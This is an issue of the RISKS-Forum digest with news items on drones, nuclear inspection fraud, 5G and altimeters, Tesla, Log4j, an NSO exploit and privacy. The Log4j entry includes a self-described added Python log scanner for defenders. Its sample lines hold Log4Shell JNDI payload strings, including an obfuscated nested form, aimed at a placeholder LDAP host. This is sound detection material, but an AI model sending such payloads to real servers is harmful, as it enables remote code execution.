Subject: Risks Digest 32.96

RISKS-LIST: Risks-Forum Digest  Wednesday 28 December 2021  Volume 32 : Issue 96

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, founder and still moderator

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
  <http://catless.ncl.ac.uk/Risks/32.96>
The current issue can also be found at
  <http://www.csl.sri.com/users/risko/risks.txt>

  Contents:
Wing Resumes Drone Deliveries in Canberra After Raven Attacks Forced Pause
 During Nesting Season (ABC Australia)
The human factor fails and is caught in U.S. nuclear plant inspections
 (NBC12)
The CIA Is Deep Into Cryptocurrency, Director Reveals (Vice)
U.S. FAA Issues Draft Airworthiness Directives Highlighting impact of 5G on
 Radar Altimeters (FAA)
AWS us-east-1 outage brings down services around the world
 (DatacenterDynamics)
Google finally knows which app to blame for Android's mysterious
 can't-call-911 bug (Android Police)
'The Beatles: Get Back' shows that deepfake tech isn't always evil (ZDNet)
Inside Tesla as Elon Musk Pushed an Unflinching Vision for Self-Driving Cars
 (NYTimes)
A New Tesla Safety Concern: Drivers Can Play Video Games in Moving Cars
 (NYTimes)
log4j (collected from Dan Goodin and others)
A $92,000 flying car can reach speeds of 63 miles per hour
 (Business Insider)
Researchers unveil new cyber-protections against "logic bombs" (techxplore)
Researchers Made a Camera That's the Size of a Grain of Salt (Vice)
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
 (Google Project Zero)
Twitter Spaces is being used by the Taliban and white nationalists
 (WashPost)
Next year's Android smartphones will be watching you (The Verge)
Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones
 (Nic Fulton)
Abridged info on RISKS (comp.risks)

----------------------------------------------------------------------

Date: Wed, 15 Dec 2021 12:28:01 -0500 (EST)
From: ACM TechNews <technews-editor@acm.org>
Subject: Wing Resumes Drone Deliveries in Canberra After Raven Attacks
 Forced Pause  During Nesting Season (ABC Australia)

Markus Mannheim, ABC News Australia 10 Dec 2021
via ACM TechNews, Wednesday, December 15, 2021

Alphabet's Wing subsidiary has relaunched drone-based coffee and fast food
deliveries to the Harrison suburb of Canberra, Australia, following the
service's suspension in September due to attacks by nesting
ravens. Ornithologist Neil Hermes discovered a pair of ravens had a nest
with three chicks in a tree near a Wing customer; the ravens were
approaching the drones from behind, as they would if the drone were a
predator and they were trying to encourage it to leave. The service
restarted after the chicks had fledged (grown wing feathers large enough for
flight). Said Hermes, "We certainly need to be careful to ensure that we're
aware of the impacts [of what we're doing]."
https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2d9e6x230174x072181&

------------------------------

Date: Mon, 13 Dec 2021 17:08:24 -0800
From: "Rob Wilcox" <robwilcoxjr@gmail.com>
Subject: The human factor fails and is caught in U.S. nuclear plant
 inspections (NBC12)

https://www.nbc12.com/2021/12/13/former-inspector-virginia-nuclear-plant-pleads-guilty-falsifying-inspection-reports/

Former inspector of Virginia nuclear plant pleads guilty of falsifying
inspection reports
North Anna Nuclear Power Station. (Source: Dominion Virginia Power)
NBC12 Newsroom 13 Dec 2021 and updated

LOUISA Co., Va. (WWBT) - The former senior resident inspector of the North
Anna Nuclear Power Station pleaded guilty to making false statements on
inspection reports.

Sixty-year-old Gregory Croon of Tennessee worked for the U.S. Nuclear
Regulatory Commission (NRC) and was working at the North Anna plant between
2016 and 2018.

On Monday, Croon pleaded guilty to falsifying inspection reports in federal
court.

``The accuracy of NRC inspection reports is critical to the NRC's oversight
of licensees' safe operation of nuclear power plants around the nation,''
said NRC Inspector General Robert J. Feitel.  ``Croon's false statements
could have jeopardized that safety oversight function.''

Federal officials did not say if there were any short or long-term safety
concerns following the investigation, only that the false reports could
have jeopardized the safety oversight of the plant.

``The combined efforts of the NRC OIG special agents and our law enforcement
partners yielded an appropriate and just result in this case. Nonetheless,
it is vital to remember that we must all remain vigilant, watch for
fraudulent activity, and report it promptly,''

Croon will be sentenced in March.

------------------------------

Date: Tue, 7 Dec 2021 12:14:59 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: The CIA Is Deep Into Cryptocurrency, Director Reveals (Vice)

*CIA Director William Burns said the agency has "a number of different
projects focused on cryptocurrency" on the go.*

There's a long-running conspiracy theory among a small number of
cryptocurrency enthusiasts that Bitcoin's anonymous inventor, Satoshi
Nakamoto, was actually the CIA or another three-lettered agency. That fringe
theory is having a fresh day in the sun after CIA Director William Burns
said on Monday that the intelligence agency has "a number of different
projects focused on cryptocurrency" on the go.

Burns made his comments at the tail end of a talk at the Wall Street
Journal's CEO Summit.  After discussing everything from the possible Russian
invasion of Ukraine to the challenges of space, someone in the audience
asked if the agency is on top of cryptocurrencies, which are currently at
the center of the ransomware epidemic that U.S. officials are attempting to
get a handle on and stamp out. Here's what Burns said:
<https://www.wsj.com/video/events/cia-director-on-today-global-challenges/C60765B3-8C1C-495F-8094-99E64C6637A5.html>

"This is something I inherited. My predecessor had started this, but had set
in motion a number of different projects focused on cryptocurrency and
trying to look at second- and third-order consequences as well and helping
with our colleagues in other parts of the U.S. government to provide solid
intelligence on what we're seeing as well."

This is hardly surprising given the focus ransomware is getting from every
corner of government. This year, a ransomware attack targeting a pipeline
company led to a shutdown, panic buying, and a gas shortage in several states.
<https://www.vice.com/en/article/dyvpyw/everything-you-need-to-know-about-the-pipeline-hack>

Cryptocurrencies "could have enormous impact on everything from ransomware
attacks, as you mentioned, because one of the ways of getting at ransomware
attacks and deterring them is to be able to get at the financial networks
that so many of those criminal networks use and that gets right at the
issue of digital currencies as well," Burns said.  [...]

https://www.vice.com/en/article/dyp7vw/the-cia-is-deep-into-cryptocurrency-director-reveals

------------------------------

Date: Wed, 8 Dec 2021 19:50:30 -0000
From: "paul cornish" <paul.a.cornish@googlemail.com>
Subject: U.S. FAA Issues Draft Airworthiness Directives Highlighting impact
 of 5G on Radar Altimeters (FAA)

On 7 Dec 2021 the U.S. Federal Aviation Administration issued draft
Airworthiness Directives related to possible interference between 5G
telecoms (including 5G handsets) and aircraft Radar altimeters.

This AD was prompted by a determination that radio altimeters cannot be
relied upon to perform their intended function if they experience
interference from wireless broadband operations in the 3.7-3.98 GHz
frequency band as used by 5G.

It is based on a worldwide task force managed by RTCA.  It found that:

1. The likelihood and severity of radio frequency interference increases
   for operations at lower altitudes.

2. That interference could cause the radio altimeter to either become
   inoperable or present misleading information.

The FAA determined that, at this time, no information has been presented
that shows radio altimeters are not susceptible to interference caused by
C-Band emissions permitted in the United States.  The FAA will examine all
airports across the U.S. to identify those with nearby 5G base stations and
will issue NOTAMs advising of the issues.

As background the radio altimeter is more precise than a barometric
altimeter and for that reason is used where aircraft height over the ground
needs to be precisely measured, such as auto-land or other low altitude or
low-viz operations.  It also feeds accurate height data to auto-pilot and
auto landing systems.  So it looks like just when the radar altimeter must
be performing at its absolute best (i.e., near the ground) it could be impacted
by 5G transmissions which could severely impact the safe flight of the
aircraft.

For more info see https://www.faa.gov/newsroom/faa-statement-5g and its
attachments.   [Also noted by Monty Solomon.  PGN]

------------------------------

Date: Tue, 7 Dec 2021 10:21:43 -0800
From: "Lauren Weinstein" <lauren@vortex.com>
Subject: AWS us-east-1 outage brings down services around the world
 (DatacenterDynamics)

https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/

------------------------------

Date: Wed, 8 Dec 2021 16:15:27 -0800
From: "Lauren Weinstein" <lauren@vortex.com>
Subject: Google finally knows which app to blame for Android's mysterious
 can't-call-911 bug (Android Police)

I think it's very notable that a LANDLINE saved the day. No apps to
confuse them. They just work.  LW

https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/

------------------------------

Date: Wed, 8 Dec 2021 00:11:21 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: 'The Beatles: Get Back' shows that deepfake tech isn't always evil
 (ZDNet)

The machine learning technology used here is very similar (if not
identical) to what has been used in the past for deepfakes, making fake
video look and sound real. A prime example of this is the Emmy
Award-winning demonstration video produced by MIT's Center for Advanced
Virtuality, "In Event of Moon Disaster," which depicts then-president
Nixon reading a prepared statement that the Apollo 11 astronauts had
perished in a catastrophe. To create it, MIT used Nixon's likeness and
speech from television appearances and fed it into a machine learning
system to synthesize the audio and video and produce the uncanny film.

The demonstration is a warning that these technologies can be used for
nefarious purposes. There are currently efforts underway, such as with
the Coalition for Content Provenance and Authenticity (C2PA), to create
standards for providing context and history for digital media to prove
the authenticity for a particular image or video/audio stream in the
future can be established, as it is expected that these technologies
will be used much more heavily in the future.

So can this deepfake technology be used for evil? Yes. But if Get Back
proves anything, it shows it can be used for "deep restoration" as well.
A great deal of vintage content can be repaired in this way, be it
original films or archival footage that can make it look brand new again
-- or the freshest they have ever looked and shown on modern content
delivery platforms.

https://www.zdnet.com/article/the-beatles-get-back-shows-that-deepfake-tech-isnt-always-evil/

--
Gabriel Goldberg, Computers and Publishing, Inc.       gabe@gabegold.com
3401 Silver Maple Place, Falls Church, VA 22042           (703) 204-0433
LinkedIn: http://www.linkedin.com/in/gabegold            Twitter: GabeG0

------------------------------

Date: Tue, 7 Dec 2021 01:23:50 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: Inside Tesla as Elon Musk Pushed an Unflinching Vision for
 Self-Driving Cars (NYTimes)

In addition, some who have long worked on autonomous vehicles for other
companies — as well as seven former members of the Autopilot team — have
questioned Tesla's practice of constant modifications to Autopilot and
F.S.D., pushed out to drivers through software updates, saying it can be
hazardous because buyers are never quite sure what the system can and
cannot do.

https://www.nytimes.com/2021/12/06/technology/tesla-autopilot-elon-musk.html

------------------------------

Date: Tue, 7 Dec 2021 14:10:10 -0500
From: "Gabe Goldberg" <gabe@gabegold.com>
Subject: A New Tesla Safety Concern: Drivers Can Play Video Games in Moving
 Cars (NYTimes)

The feature raises fresh questions about whether Tesla is compromising
safety as it rushes to add new technologies.

Not long after buying a Tesla Model 3 this summer, Vince Patton saw a
YouTube clip highlighting a feature that took him by surprise: three
video games that can be played on the large touch screen mounted in
front of the dashboard — while driving down the road.

“I thought surely that can’t be right,” Mr. Patton, a retiree in Lake
Oswego, Ore.

But in a parking lot, he gave it a try, and he was able to play a
solitaire game on the Model 3 while in motion. “I only did it for like
five seconds and then turned it off,” he said. “I’m astonished. To me,
it just seems inherently dangerous.”

The automaker added the games in an over-the-air software update that
was sent to most of its cars this summer. They can be played by a driver
or by a passenger in full view of the driver, raising fresh questions
about whether Tesla is compromising safety as it rushes to add new
technologies and features in its cars.

https://www.nytimes.com/2021/12/07/business/tesla-video-game-driving.html

Tesla, not playing with a full deck...

------------------------------

Date: Thu, 16 Dec 2021 11:39:31 PST
From: Peter G Neumann <neumann@csl.sri.com>
Subject: log4j (collected from Dan Goodin and others)

U.S. Cert:

Security experts around the world raced Friday, Dec. 10, 2021, to patch one
of the worst computer vulnerabilities discovered in years, a critical flaw
in open-source code widely used across industry and government in cloud
services and enterprise software. Cybersecurity experts say users of the
online game Minecraft have already exploited it to breach other users by
pasting a short message into a chat box.

"I'd be hard-pressed to think of a company that's not at risk," said Joe
Sullivan, chief security officer for Cloudflare, whose online infrastructure
protects websites from malicious actors. Untold millions of servers have
it installed, and experts said the fallout would not be known for several
days.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce

 - - - -

Monty Solomon <monty@roscom.com>:
Hackers launch over 840,000 attacks through Log4J flaw

https://arstechnica.com/information-technology/2021/12/hackers-launch-over-840000-attacks-through-log4j-flaw/

 - - - -

Monty Solomon <monty@roscom.com>
As Log4Shell wreaks havoc, payroll service reports ransomware attack

https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/

 - - - -

Dan Goodin, Ars Technica, 9 Dec 2021
Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet
Minecraft is the first, but certainly not the last, app known to be affected.

<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>

Exploit code has been released for a serious code-execution vulnerability in
Log4j, an open source logging utility that's used in countless apps,
including those used by large enterprise organizations, several websites
reported last Thursday.

Word of the vulnerability first came to light on sites catering to users of
Minecraft, the best-selling game of all time. The sites warned that hackers
could execute malicious code on servers or clients running the Java version
of Minecraft by manipulating log messages, including from things typed in
chat messages. The picture became more dire still as Log4j was identified as
the source of the vulnerability, and exploit code was discovered posted
online.

A big deal

``The Minecraft side seems like a perfect storm, but I suspect we are going
to see affected applications and devices continue to be identified for a
long time,'' HD Moore, founder and CTO of network discovery platform Rumble,
said.  ``This is a big deal for environments tied to older Java runtimes:
Web front ends for various network appliances, older application
environments using legacy APIs, and Minecraft servers, due to their
dependency on older versions for mod compatibility.''

Reports are already surfacing of servers performing Internet-wide scans in
attempts to locate vulnerable servers.  Log4j is incorporated into a host of
popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and
Apache Flink. That means that a dizzying number of third-party apps may also
be vulnerable to exploits of the same high severity as those threatening
Minecraft users.

At the time this post went live, there wasn't much known about the
vulnerability. One of the few early sources providing a tracking number for
the vulnerability was Github, which said it's CVE-2021-44228. Security firm
Cyber Kendra on late Thursday reported a Log4j RCE Zero day being dropped on
the Internet and concurred with Moore that ``there are currently many
popular systems on the market that are affected.''

The Apache Foundation has yet to disclose the vulnerability, and
representatives there didn't respond to an email. This Apache page does
acknowledge the recent fixing of a serious vulnerability. Moore and other
researchers said the Java deserialization bug stems from Log4j making
network requests through the JNDI to an LDAP server and executing any code
that's returned. The bug is triggered inside of log messages with use of the
${} syntax.

Additional reporting from security firm LunaSec said
that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less
affected by this attack vector, at least in theory, because the JNDI can't
load remote code using LDAP. Hackers may still be able to work around this
by leveraging classes already present in the target application. Success
would depend on whether there are any dangerous gadgets in the process,
meaning newer versions of Java may still prevent code execution but only
depending on the specifics of each application.

LunaSec went on to say that cloud services from Steam and Apple iCloud have
also been found to be affected. Company researchers also pointed out that a
different high-severity vulnerability in struts led to the 2017 compromise
of Equifax, which spilled sensitive details for more than 143 million U.S.
consumers.

Cyber Kendra said that in November the Alibaba Cloud security team disclosed
a vulnerability in Log4j2 -- the successor to Log4j -- that stemmed from
recursive analysis functions, which attackers could exploit by constructing
malicious requests that triggered remote code execution. The firm strongly
urged people to use the latest version of Log4j2 available here.

What it means for Minecraft

The Spigot gaming forum said that Minecraft versions 1.8.8 through the most
current 1.18 release are all vulnerable, as did other popular game servers
such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged
Minecraft players to take extra care.

``The issue can allow remote access to your computer through the servers you
log into,'' site representatives wrote. ``That means any public server you
go onto creates a risk of being hacked.''

Reproducing exploits for this vulnerability in Minecraft isn't
straightforward because success depends not only on the Minecraft version
running but also on the version of the Java framework the Minecraft app is
running on top of. It appears that older Java versions have fewer built-in
security protections that make exploits easier.  On Friday, Minecraft rolled
out a new game version that fixes the vulnerability.  ``We are aware of
recent discussions regarding a public exploitation of a Log4j remote code
execution vulnerability affecting various industry-wide Apache products,''
Microsoft said in a statement. ``We've taken steps to keep our customers safe
and protected, which includes rolling out a fix that blocks this issue for
Java Edition 1.18.1. Customers who apply the fix are protected.''
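
The post explains the mechanism only in outline: a `${...}` lookup inside a
logged message makes Log4j issue a JNDI request, and the Java update levels
quoted from LunaSec (6u211, 7u201, 8u191, 11.0.1) change what that request can
load.  The following is an added example written for this digest entry, not
code from Ars Technica, LunaSec or the Apache Log4j project.  It is a
defender's log scanner: because Log4j substitutes nested lookups recursively,
a literal substring match on `${jndi:` misses lookups assembled from inner
ones, so the scanner resolves innermost lookups first and then reports the
JNDI target.  A second helper applies the Java update thresholds the post
quotes to a version string from an inventory.  The sample log lines, the
function names and the 203.0.113.0/24 addresses are all constructed for the
example; the normalization models only the handful of lookup forms needed
here, not Log4j's full lookup set.

```python
"""Added example (not from the RISKS digest, Ars Technica, or Apache Log4j):
a defensive scanner for Log4j-style ${jndi:...} lookups in request/log text,
plus a check of the Java update thresholds quoted in the post.  Sample log
lines are constructed; 203.0.113.0/24 is a documentation address range."""
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Sentinel marking a resolved JNDI lookup so later rounds leave it alone.
_MARK = "\x00JNDI:%s\x00"


def _resolve_one(m: "re.Match") -> str:
    """Resolve one innermost lookup into the form a detector needs to see."""
    body = m.group(1)
    head, _, rest = body.partition(":")
    key = head.lower()
    if key == "jndi":
        return _MARK % rest                 # the lookup we are hunting for
    if ":-" in body:                        # ${prefix:key:-default} -> default
        return body.split(":-", 1)[1]
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    return body  # unknown lookup: drop the ${} wrapper so resolution terminates


def normalize(text: str, max_rounds: int = 16) -> str:
    """Substitute innermost lookups repeatedly, as Log4j's recursive resolution
    would; the round limit keeps pathological input from spinning."""
    for _ in range(max_rounds):
        new = INNER.sub(_resolve_one, text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(text: str) -> List[str]:
    """Return JNDI targets (e.g. 'ldap://host:port/x') present after normalization."""
    return re.findall("\x00JNDI:(.*?)\x00", normalize(text))


def scan_logs(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, target) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        for target in find_jndi_lookups(line):
            hits.append((n, target))
    return hits


# Update levels quoted in the post at which JNDI stops loading remote classes
# over LDAP by default.  Versions below the threshold keep the older default.
_SAFE_UPDATE = {6: 211, 7: 201, 8: 191}


def java_loads_remote_ldap_classes(version: str) -> bool:
    """True if this Java version string predates the thresholds above.
    Handles '1.8.0_191', '1.7.0_201-b09', '11.0.1', '17.0.2'.  A False result
    is only the runtime default: the post notes that classes already present
    in the application can still be abused, so patching Log4j is the fix."""
    v = version.split("-")[0]
    if v.startswith("1."):                          # legacy 1.x.y_update form
        major = int(v.split(".")[1])
        update = int(v.split("_")[1]) if "_" in v else 0
        threshold = _SAFE_UPDATE.get(major)
        return True if threshold is None else update < threshold
    parts = [int(p) for p in v.split(".")]
    parts += [0] * (3 - len(parts))
    if parts[0] == 11:
        return tuple(parts) < (11, 0, 1)
    # Assumption for the example: releases before 11 with no quoted threshold
    # are treated as still loading remote classes; 12 and later inherit the fix.
    return parts[0] < 11


# Constructed sample lines: a benign request, a plain lookup, and a lookup
# built from nested lookups that a literal '${jndi:' substring match misses.
SAMPLE_LOGS = [
    '203.0.113.10 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.11 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.12 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b}"',
]

if __name__ == "__main__":
    for n, target in scan_logs(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup -> {target}")
    for ver in ("1.8.0_181", "1.8.0_191", "11.0.1", "17.0.2"):
        print(ver, "loads remote LDAP classes by default:",
              java_loads_remote_ldap_classes(ver))
```

Run it over a web-server access log or the application's own log files and
every hit is a line that deserves a look at what the logging pipeline did with
it; the version helper is only for triage of an inventory, since the post's
own caveat (gadgets already on the classpath) means the real remediation is
the Log4j 2.15.0 release linked in the CISA advisory above.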

------------------------------

Date: Tue, 7 Dec 2021 12:44:52 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: A $92,000 flying car can reach speeds of 63 miles per hour
 (Business Insider)

If you've always dreamed of flying to work, that dream may very soon be a
reality.

If you have $92,000, that is.

Companies are always looking for new market niches, and flying cars are
quickly becoming the next big thing.

There are plans for cars that both fly and work on the road and for flying
taxis that will aim to form the basis of future travel.

Jetson is one of these companies.

The company aims "to make the skies available for everyone with our safe
personal electric aerial vehicle," according to its website.

The company's first flying car, Jetson One, is already on sale.

Jetson One has a maximum speed of 63mph thanks to its eight electric motors
which generate 102 horsepower. The car can run continually for 20 minutes.
[...]

https://www.businessinsider.com/new-flying-car-goes-63-mph-20-minutes-costs-92000-2021-12

------------------------------

Date: Sat, 11 Dec 2021 10:17:57 +0800
From: "Richard Stein" <rmstein@ieee.org>
Subject: Researchers unveil new cyber-protections against "logic bombs"
 (techxplore.com)

https://techxplore.com/news/2021-12-unveil-cyber-logic.html

"The researchers looked into Mystique, a new class of attacks on printed
objects that leverage emerging 4D printing technology to introduce embedded
computer code—or logic bombs—by manipulating the manufacturing process.

"Mystique enables visually harmless objects to behave maliciously when a
logic bomb is triggered by a stimulus such as changes in temperature,
moisture, pH or modifications to the materials used initially, potentially
causing catastrophic operational failures when they are used."

4D printing (see https://en.wikipedia.org/wiki/4D_printing) applies 3D
printer technology with "ink" (gels, fibers, polymers, etc.) sensitized to
adjust their shape or material properties in response to environmental
conditions: pH, temperature, stress, humidity, magnetic field, sound level,
etc. The "Mystique" class of defects and vulnerabilities might arise in
printed structures such as artificial bone or tissue foundation.

The essay discusses means of Mystique-injected defect detection using
CAT scans and material sensors to ensure specified manufactured product
outcome before shipping to a customer.

[Trust that neither the inspection verification measures, nor the
employees with product release approval, are compromised.]

------------------------------

Date: Tue, 7 Dec 2021 12:12:28 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: Researchers Made a Camera That's the Size of a Grain of Salt (Vice)

*It can take images that are better than existing tech.*

A newly-developed camera the size of a grain of salt can take clear,
full-color images at the level of cameras that are 500,000 times larger.

Researchers at Princeton University and the University of Washington created
a new type of optical system, called a metasurface, to shrink the camera's
hardware down to size, and combined this with machine-learning image
processing that enables the camera to produce clear images in natural
lighting. Previously, micro-cameras could only produce useful images in
perfect laboratory settings, according to the researchers
<https://engineering.princeton.edu/news/2021/11/29/researchers-shrink-camera-size-salt-grain>.
Their work is published in the journal *Nature*.
<https://www.nature.com/articles/s41467-021-26443-0>

Each camera consists of 1.6 million cylindrical posts which interact with
light to produce the images. These posts are as small as the human
immunodeficiency virus (HIV). The surfaces are made from silicon nitride, a
material that makes them compatible with computing microchip manufacturing.
This means they'd be cheaper and faster to produce than current full-size
camera lenses.  [...]

https://www.vice.com/en/article/4awxvg/researchers-made-a-camera-thats-the-size-of-a-grain-of-salt

------------------------------

Date: Wed, 15 Dec 2021 13:33:35 -0500
From: Monty Solomon <monty@roscom.com>
Subject: A deep dive into an NSO zero-click iMessage exploit: Remote Code
 Execution (Google Project Zero)

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based
zero-click exploit being used to target a Saudi activist. In this two-part
blog post series we will describe for the first time how an in-the-wild
zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most
technically sophisticated exploits we've ever seen, further demonstrating
that the capabilities NSO provides rival those previously thought to be
accessible to only a handful of nation states.

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

------------------------------

Date: Mon, 13 Dec 2021 00:56:14 -0500
From: Gabe Goldberg <gabe@gabegold.com>
Subject: Twitter Spaces is being used by the Taliban and white nationalists
 (WashPost)

Employees who complained about the lack of moderation say they were
sidelined.

https://www.washingtonpost.com/technology/2021/12/10/twitter-turmoil-spaces/

------------------------------

Date: Tue, 7 Dec 2021 10:46:09 -1000
From: geoff goodfellow <geoff@iconia.com>
Subject: Next year's Android smartphones will be watching you (The Verge)

*Qualcomm's new always-on smartphone camera is a potential privacy
nightmare*

“Your phone's front camera is always securely looking for your face, even if
you don't touch it or raise to wake it.” That's how Qualcomm Technologies
vice president of product management Judd Heape introduced the company's new
always-on camera capabilities <https://youtu.be/3H6tfcZLHfg?t=10758> in the
Snapdragon 8 Gen 1 processor set to arrive in top-shelf Android phones early
next year.
<https://www.theverge.com/2021/11/30/22809687/qualcomm-snapdragon-8-gen-1-chip-smartphone-processor-specs-details>

Depending on who you are, that statement can either be exciting or
terrifying. For Qualcomm, it thinks this new feature will enable new use
cases, like being able to wake and unlock your phone without having to pick
it up or have it instantly lock when it no longer sees your face.

But for those of us with any sense of how modern technology is used to
violate our privacy, a camera on our phone that’s always capturing images
*even when we’re not using it* sounds like the stuff of nightmares and has a
cost to our privacy that far outweighs any potential convenience benefits.

Qualcomm's main pitch for this feature is for unlocking your phone any time
you glance at it, even if it's just sitting on a table or propped up on a
stand. You don't need to pick it up or tap the screen or say a voice command
-- it just unlocks when it sees your face. I can see this being useful if
your hands are messy or otherwise occupied (in its presentation, Qualcomm
used the example of using it while cooking a recipe to check the next
steps). Maybe you’ve got your phone mounted in your car, and you can just
glance over at it to see driving directions without having to take your
hands off the steering wheel or leave the screen on the entire time.

The company is also spinning it as making your phone *more secure* by
automatically locking the phone when it no longer sees your face or detects
someone looking over your shoulder and snooping on your group chat. It can
also suppress private information or notifications from popping up if you’re
looking at the phone with someone else. Basically, if you're not looking at
it, your phone is locked; if it can see you, it will be unlocked. If it can
see you *and* someone else, it can automatically lock the phone or hide
private information or notifications from displaying on the screen. [...]

https://www.theverge.com/22811740/qualcomm-snapdragon-8-gen-1-always-on-camera-privacy-security-concerns

------------------------------

Date: Wed, 15 Dec 2021 12:57:11 +1100
From: Nic Fulton <nicfulton@gmail.com>
Subject: Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones
 (RISKS-32.95)

> You asked "Is it illegal to use your cell-phone for navigation purposes?
> What is the difference between that and a built-in screen for navigation?"

https://roadsafety.transport.nsw.gov.au/stayingsafe/mobilephones/know-the-rules.html

has the answer.

You have to mount the phone in an approved cradle.

"2. Can I touch my phone if it is in a cradle?

If your phone is secured in a cradle, you can only touch your phone:

* To make or receive a phone call;
* For audio playing functions; or
* For using a driver's aid (such as navigation)."

I hope this helps. The law is pretty sensible, which is good, I guess.

  [Also noted discursively by Peter Knoppers, also by Simon Wright and John
  Levine, albeit more tersely.  PGN]

------------------------------

Date: Mon, 1 Aug 2020 11:11:11 -0800
From: RISKS-request@csl.sri.com
Subject: Abridged info on RISKS (comp.risks)

 The ACM RISKS Forum is a MODERATED digest.  Its Usenet manifestation is
 comp.risks, the feed for which is donated by panix.com as of June 2011.
=> SUBSCRIPTIONS: The mailman Web interface can be used directly to
 subscribe and unsubscribe:
   http://mls.csl.sri.com/mailman/listinfo/risks

=> SUBMISSIONS: to risks@CSL.sri.com with meaningful SUBJECT: line that
   includes the string `notsp'.  Otherwise your message may not be read.
 *** This attention-string has never changed, but might if spammers use it.
=> SPAM challenge-responses will not be honored.  Instead, use an alternative
 address from which you never send mail where the address becomes public!
=> The complete INFO file (submissions, default disclaimers, archive sites,
 copyright policy, etc.) is online.
   <http://www.CSL.sri.com/risksinfo.html>
 *** Contributors are assumed to have read the full info file for guidelines!

=> OFFICIAL ARCHIVES:  http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
  http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
  Also, ftp://ftp.sri.com/risks for the current volume/previous directories
     or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
  If none of those work for you, the most recent issue is always at
     http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-32.00
  ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
 *** NOTE: If a cited URL fails, we do not try to update them.  Try
  browsing on the keywords in the subject line or cited article leads.
  Apologies for what Office365 and SafeLinks may have done to URLs.
==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

------------------------------

End of RISKS-FORUM Digest 32.96
************************